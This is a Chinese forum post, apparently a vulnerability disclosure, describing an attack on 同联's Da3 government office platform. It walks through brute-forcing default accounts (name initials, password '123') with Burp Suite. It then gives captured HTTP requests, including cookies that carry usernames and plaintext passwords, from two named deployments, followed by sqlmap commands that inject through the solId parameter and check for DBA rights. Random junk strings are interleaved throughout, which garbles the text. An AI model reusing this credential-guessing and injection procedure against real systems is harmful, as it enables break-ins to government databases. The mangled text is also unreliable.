|
% m2 k9 o6 B) T7 g1 V% L: @
% `: Q# t. b6 m$ X, t
# c( `* O8 ^1 v! k0 M' Q$ `: }% `4 N" z) K* ?2 m7 J- a8 r
平台简介:
" h+ M Q. T) G# Z) d
! [( V4 n/ d2 Z/ p9 E3 q2 P" @$ l6 ]- Q2 J. s
9 S' n* t' m5 K' c" g# r * f2 ?2 }% K4 T2 c7 |
2 |% [. ^8 s) @) A: b
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
h! ~! o0 p3 w" e/ j h$ h! ~) {同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
n% `% K: b3 h3 w, V& [
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!/ ]! ?3 b) Y. F9 d2 H, P
9 E' n& u! k o% H- s, ?9 M
8 a. w+ {/ R; ?9 _( g5 d- q
3 m% x' w5 Z4 }4 X+ s; u( {/ U& K+ o' u
m% s: H0 k" ~% @( W3 K' ^* h( D! p
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( d( S& I( Y! I; ^
5 e9 B7 T/ h5 p- B! K5 e' ?3 M8 B' _6 ]( |. {9 h1 H
6 O. c0 J5 V. v3 F9 W) l ; A) ~/ b* p1 Y, z& p) M
, z- d* O' R! S* t, r
http://1.1.1.1:7197/cap-aco/#(案例2-)( G% S8 k2 m6 K0 b, m! n c W2 C
0 U2 |/ S0 Z1 h. S. g* o7 `
' Q; Q X5 I/ v7 y( { http://www.XXOO.com (案例1-官网网站); ~; L7 D- q3 z2 l
' K9 w: t" V. z8 |% t' ?% A4 }7 K/ k6 [$ c4 ~2 g/ D* h8 y
7 H. E8 ^/ o0 m# {3 ~ , a. R& v: P2 E( b
( b+ T: w) u `4 @7 p 漏洞详情:
) s+ X7 s8 T( B& t0 l1 L; I7 L, K , _& F, w3 G+ Z+ Z
( X/ c# \+ [3 ]* Q) } 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试/ _1 }+ F) x8 w T7 l% t8 |- |
3 C+ T* E! q ^2 |2 U! O/ h0 @0 n1 t
8 o N9 c: v9 Q; k" Y8 n
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: ~7 Z, p7 { y3 I
5 g) Q1 t# C$ ^$ }
# p+ e8 F# {$ }& F7 l% i. ] ; p4 N7 |* T' h( v. [0 `
! W$ @- N" D0 L. T0 n6 j% T" ]9 n
" d4 W, h/ M7 X) u0 X 
( k9 b( f* ]' A) s6 E9 f: j/ O
/ ~/ @, s: }! Z* }: d, C' x; L) O+ T, f0 z; p$ q# @1 o; [
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:$ Y$ j: ` ]' g, f: R
1 N% v+ ?/ w3 b/ A5 O5 w/ K8 u
9 {( p" S4 e7 `0 u9 Q' U. x3 s
1、案例1-官方网站4 r- D- Q: ~* U4 ^0 z H
( O+ t; G6 s2 H) B! x
$ ]9 G! n8 B) p2 o" h) _% r) O
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1% ?$ Y) A6 }+ J8 j5 b* M
# l( E; N" _6 [4 p3 H
8 m* D& ]2 s6 h' O; _1 ?3 [$ Y, J Host: www.XXOO.com, R% Z/ e3 d x. g& h1 g: q3 ?0 L
7 ^6 ]9 A) b& U: \! E$ ?
6 n" ]7 E) }5 g0 w4 P Proxy-Connection: Keep-Alive2 e. g0 J: ^1 R7 |6 A
& g2 p* a# w* k1 K, w7 f& @5 Q3 r2 L3 u X2 J) Q0 ?
Accept: application/json, text/javascript, */*; q=0.01
# N) g$ G; p' J8 p) V8 ~
( v6 y8 y( z8 {% k3 x8 h3 @; {' \# y+ k* R" Q- r6 [' C
Accept-Language: zh-CN
# s6 o& g* I% V* }- X8 C
) h$ p( u: T2 X+ v+ u, R) D
3 S7 p' X0 e5 z9 A7 |# ] Content-Type: application/json! |- _' W+ n1 j4 }2 z9 D
, D# v& u# n: i
5 v) `1 R, o! P0 p& a( d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
7 U: f: D% E- E % a# s4 d; z5 v; e* Z
5 |0 G/ }9 z' X% e( J X-Requested-With: XMLHttpRequest
; `" f$ \9 v. Q7 n' x% z3 } $ F% J# S+ O! _( {
o+ q& k7 X0 W; \( O
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
: U y) y. O- Y. r: g 6 P9 c% ?$ u6 t4 x. O
% s/ A" [) y& Q! {' M% s9 i( s Accept-Encoding: gzip, deflate, sdch+ x/ f& |4 @2 @' ?& n! N( C) B$ M
3 t' U0 F) b% {* C0 d% t
& o5 S" K* x% _' B4 Z r" u Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e% i1 I: k' N d4 {, F
" B/ ]' V$ i. v
% l, l$ B" o% P) c9 q0 i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
! m1 B8 V8 C" T" V2 u7 M/ B( E ! @5 d& V6 Z2 p1 A: A6 M
4 B8 B) w0 q, M+ Q
 - S6 m* K0 y. a* X5 H
3 U! u4 \' d) Q
$ N( {5 A. C9 w( Q 
3 Q9 U) C( ?% P. m$ ]" I4 J- r4 Q : X0 U( F3 M% w. ]8 l# {
' _, Z* ]& W6 V4 R( }8 I$ [
. T: a8 {0 H5 x0 U
6 k. e8 } E$ z6 s& u; S g3 z0 K' Y6 y
1 F: M% P4 D8 ?$ N6 I
$ K! t& r# x4 G6 @3 k! f& y+ f: I+ ]5 u, G8 a- i) [
2 l7 v6 m/ y2 o
; V$ S' ]4 I( k* {% p8 z, C
" o! u' p- ^% @* U 2、案例2-某天河云平台
# x8 c- f4 G" O& K z& h
! z- U: [$ y0 L6 P1 K% G5 k" x7 ?: A* b; l
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ O- k& d( {" K9 B, t$ F
. P& x; y& |- ^
" c2 y' D& S4 J, j$ q- T- F0 T' _ Host: 1.1.1.:71974 b# C& t2 o5 n. X& a o
5 f) h" o* ?" o9 g' Y5 C( `
; D, t& J: X/ B4 L. D
Accept: application/json, text/javascript, */*; q=0.01
/ J x* g4 h. E' i2 X 9 \ e+ y7 v/ K8 ?7 X
2 T3 Z2 a: [+ D. q; X+ l
X-Requested-With: XMLHttpRequest
7 s* I+ }) v( t! j. m5 m' G K
7 |, [/ u; b1 L1 S- I- q8 e2 z# u; d6 _) p* n3 T$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
; i. k9 G" v) A i. e' T; F6 I
7 Y/ X$ R2 R1 X, z9 j) P6 J8 ?: e3 s7 L5 @; M
Content-Type: application/json
4 U- a2 U0 O1 `- a# m) \! {4 d
* e q+ t* L- S9 y' |) ~$ C* v0 m/ [1 G+ o+ I
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008( [$ p# B6 L( `! ~- |2 x) K
- R; R( X9 R- ]' b, G/ z
6 T' H, k* j) N Accept-Language: zh-CN,zh;q=0.8
2 m i9 q0 p8 d% |( G
. o* M; Z; J, U5 L" s0 c& a/ E) P B2 C$ I! ~$ Y% r% U! V% N" {) U* n! j: V
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1: N# N- }7 ]+ E
r8 h, w3 P" r2 E+ |% k( T5 ]
" v8 {% J6 O- h! d2 T1 l$ t Connection: close
3 \- I- a# f4 {3 j) Q2 C+ d 0 n) I- [/ @& T3 ~
: Q! V$ U+ Q) G Q
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" Z4 X, S' f( }
# H ^; S* C, i! I+ Y
; T! s" ~) T/ J: e2 N8 q" R* p
 ! J X5 {/ d8 X2 I! F/ S5 A! a
1 S9 a$ W: t% g; K6 r: A
- t; F, }/ |+ j
8 y1 S0 z( b. N3 {- v- Z" r
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对